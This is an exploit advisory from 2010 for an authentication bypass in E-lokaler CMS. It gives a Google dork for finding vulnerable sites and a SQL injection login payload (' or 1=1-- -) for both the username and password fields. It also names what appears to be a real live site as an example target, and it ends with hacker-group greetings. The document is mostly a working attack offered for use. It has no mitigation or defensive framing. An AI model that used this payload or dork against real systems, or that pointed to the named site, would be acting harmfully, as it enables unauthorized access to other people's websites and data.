E-lokaler CMS suffers from a remote SQL injection vulnerability that allows for authentication bypass.
d171262c1e9ac034d6deaebcfbde39c09dc6772753256d7b2b8690fef4df521e
[]
_____ .__ .__ ____
/ _ \ | | | | ___________ ______ / __ \ ______
/ /_\ \| | | | / __ \_ __ \\_ __ \ / { } \\_ __ \
/ | \ |_| | \ ___/| | \| | \\// {__} \| \\/
/\____|__ /____/__}XXXX \___ >__| |__| \ Ti3s /|__|
\/ \/ \/ \______/
+++++++++++++++++++++++++++++++++++++++++++++++++++++++
++ E-lokaler CMS Authentication Bypass Vulnerability ++
+++++++++++++++++++++++++++++++++++++++++++++++++++++++
Author : ali_err0r
Date : 2010/11/26
Dork : intitle"E-lokaler CMS" & ur Imagination
Version : v.05 - 2
Tested on : windows 7 64bit
+++++++++++++++++++++++++++++++++++++++++++++++++++++++
POC/xPL
http://target./admin
username : ' or 1=1-- -
password : ' or 1=1-- -
ex: http://www.seed.elr.dk/admin
+++++++++++++++++++++++++++++++++++++++++++++++++++++++
ali_err0r shObe diGari joZ in ID naDaraD :D
Ba Tashakor aZ Hame DosTaye IraNi ;)
dostan: biOxsE , asKNsTR , fx()
+++++++++++++++++++++++++++++++++++++++++++++++++++++++